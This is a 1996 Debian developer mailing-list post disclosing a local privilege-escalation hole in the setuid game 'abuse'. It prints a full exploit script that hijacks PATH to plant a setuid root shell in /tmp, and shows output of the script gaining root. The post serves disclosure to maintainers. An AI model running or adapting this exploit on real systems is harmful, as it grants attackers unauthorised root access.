IMPORTANT: abuse security hole. Debian is vunerable!

To: debian-devel@lists.debian.org
Cc: Doug Geiger <runexe@ntplx.net>
Subject: IMPORTANT: abuse security hole. Debian is vunerable!
From: Joey Hess <joey@kite.preferred.com>
Date: Wed, 25 Sep 1996 15:04:03 -0400 (EDT)
Message-id: <[🔎] Pine.LNX.3.94.960925145741.4309B-100000@kite.preferred.com>
Reply-to: Joey Hess <joey@kite.preferred.com>

I applied this crack script to my system, with abuse 1.10-4 installed, and
it got me a root shell. I'm posting to debian-devel because I believe this
is a really old and well known hole in abuse, so I see no point in covering
this up.

Here's the script:

--------------------------cut---------------------------

echo ================ abuser.sh - gain root on Linux Red Hat 2.1 system
echo ================ Checking system vulnerability
if test -u /usr/lib/games/abuse/abuse.console
then
echo ++++++++++++++++ System appears vulnerable.
cd /tmp
cat << _EOF_ > /tmp/undrv
#!/bin/sh
/bin/cp /bin/sh /tmp/abuser
/bin/chmod 4777 /tmp/abuser
_EOF_
chmod +x /tmp/undrv
PATH=/tmp
echo ================ Executing Abuse
/usr/lib/games/abuse/abuse.console
/bin/rm /tmp/undrv
if test -u /tmp/abuser
then
echo ++++++++++++++++ Exploit successful, suid shell located in
/tmp/abuser
else
echo ---------------- Exploit failed
fi
else
echo ---------------- This machine does not appear to be vulnerable.
fi

------------------------------cut------------------------------

Here's a sample of it in use:

[joey@kite] /tmp>sh abuse_hole 
================ abuser.sh - gain root on Linux Red Hat 2.1 system
================ Checking system vulnerability
++++++++++++++++ System appears vulnerable.
================ Executing Abuse
 Abuse (Engine Version 1.10)
sh: lnx_sdrv: command not found
sound effects driver returned failure, sound effects disabled
Added himem block (4000000 bytes)
could not run undrv, please make sure it's in your path
No network driver, or network driver returned failure
Specs : main file set to abuse.spe
Lisp : 501 symbols defined, 99 system functions, 295 pre-compiled
functions
Unable to open filename art/dev.spe for requested item c_mouse1
++++++++++++++++ Exploit successful, suid shell located in /tmp/abuser
[joey@kite] /tmp>abuser
bash# id
uid=500(joey) gid=500(joey) euid=0(root)
groups=500(joey),20(dialout),24(cdrom),26(tape),100(users),518(pub),520(network)
bash# whoami
root
bash# 

For now, I reccommend that everyone dpkg -r abuse. Is abuse still being
maintained, or is it orphaned?

-- 
#!/usr/bin/perl -pl-                                   # ,,ep) ayf >|)nj,,
$_=reverse lc$_;s@"@''@g;y/[]{A-Y}<>()a-y1-9,!.?`'/][} #         Joey Hess
{><)(eq)paj6y!fk7wuodbjsfn^mxhl5Eh29L86`i'%,/;s@k@>|@g # jeh22@cornell.edu
               "true - do nothing, successfully" - - true (1)

Reply to:

Prev by Date: Bug#4585: passwd is not NIS compatible
Next by Date: Bug#4592: xemacs: can't resolve symbol 'xbitmap'
Previous by thread: Bug#4591: Stray `tar.gz' file in `manpages' package
Next by thread: Bug#4592: xemacs: can't resolve symbol 'xbitmap'
Index(es):
- Date
- Thread